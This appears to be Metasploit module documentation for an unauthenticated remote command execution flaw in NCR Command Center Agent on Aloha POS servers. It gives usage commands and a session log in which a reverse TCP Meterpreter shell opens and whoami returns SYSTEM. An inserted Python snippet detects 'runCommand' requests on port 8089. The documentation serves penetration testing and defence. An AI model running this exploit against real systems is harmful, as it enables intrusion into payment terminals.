documentation/modules/exploit/windows/misc/ncr_cmcagent_rce.md
CMCAgent in NCR Command Center Agent 16.3 on Aloha POS/BOH servers permits the submission of a runCommand parameter (within an XML document sent to port 8089) that enables the remote, unauthenticated execution of an arbitrary command as SYSTEM, as exploited in the wild in 2020 and/or 2021. NOTE: the vendor's position is that exploitation occurs only on devices with a certain "misconfiguration."
Successfully tested against NCR Command Center Agent 16.2.1.1.
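A defender-side check for the traffic described above, as an added example (not part of the Metasploit module or of NCR's software): it flags captured request bodies sent to port 8089 that carry a `runCommand` parameter. The function name, the size cap and the sample messages are assumptions; the sample XML is constructed and does not reproduce the agent's real message schema.

```python
import re
import xml.etree.ElementTree as ET

AGENT_PORT = 8089          # port named in the description above
MAX_BODY = 64 * 1024       # assumption: cap on bytes inspected per request
NAME = "runcommand"        # parameter name from the description, lower-cased
RAW_HIT = re.compile(rb"runCommand", re.IGNORECASE)

def _local(tag):
    """Strip an XML namespace prefix such as '{urn:x}runCommand'."""
    return tag.rsplit("}", 1)[-1].lower()

def inspect(dst_port, body):
    """Return (verdict, detail) for one captured request body."""
    if dst_port != AGENT_PORT or not RAW_HIT.search(body[:MAX_BODY]):
        return ("ignore", None)
    # Never expand DTDs/entities from untrusted traffic; flag on the raw match.
    if b"<!DOCTYPE" in body or b"<!ENTITY" in body:
        return ("alert", "raw match; DTD present, not parsed")
    try:
        root = ET.fromstring(body[:MAX_BODY])
    except ET.ParseError:
        return ("alert", "raw match; body is not well-formed XML")
    for el in root.iter():
        if _local(el.tag) == NAME:
            return ("alert", (el.text or "").strip())
        for key, val in el.attrib.items():
            if _local(key) == NAME:
                return ("alert", val.strip())
            if val.strip().lower() == NAME:      # e.g. <param name="runCommand">
                return ("alert", (el.text or el.get("value") or "").strip())
    return ("review", "string present only in text content")

# Constructed captures (dst_port, body); the element names are invented for
# the demo and are NOT the agent's real message schema.
SAMPLES = [
    (8089, b"<msg><runCommand>PLACEHOLDER_CMD</runCommand></msg>"),
    (8089, b'<msg><param name="runCommand">PLACEHOLDER_CMD</param></msg>'),
    (8089, b"<msg><status>ok</status></msg>"),
    (8080, b"<msg><runCommand>PLACEHOLDER_CMD</runCommand></msg>"),
    (8089, b"<msg><runCommand>PLACEHOLDER_CMD"),
]

if __name__ == "__main__":
    for port, body in SAMPLES:
        print(port, inspect(port, body))
```

An `alert` verdict returns the extracted command string for triage; `review` means the name appeared only inside text content and needs a human look.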
The original link is https://rdf2.alohaenterprise.com/client/CMCInst.zip. Since the URL was inaccessible, the file was downloaded using the Web Archive. Here’s the final URL:
https://web.archive.org/web/20210129020048/https://rdf2.alohaenterprise.com/client/CMCInst.zip
use windows/misc/ncr_cmcagent_rce
set rhosts [ip]
set lhost [ip]
run

msf > use windows/misc/ncr_cmcagent_rce
[*] Using configured payload windows/meterpreter/reverse_tcp
msf exploit(windows/misc/ncr_cmcagent_rce) > set LHOST 192.168.2.107
LHOST => 192.168.2.107
msf exploit(windows/misc/ncr_cmcagent_rce) > set RHOSTS 192.168.2.106
RHOSTS => 192.168.2.106
msf exploit(windows/misc/ncr_cmcagent_rce) > exploit
[*] Started reverse TCP handler on 192.168.2.107:4444
[*] 192.168.2.106:8089 - Generating payload
[*] 192.168.2.106:8089 - Check your shell
[*] Sending stage (177734 bytes) to 192.168.2.106
[*] Meterpreter session 1 opened (192.168.2.107:4444 -> 192.168.2.106:49849) at 2025-10-23 05:38:45 -0400
meterpreter > shell
Process 5188 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19044.4529]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system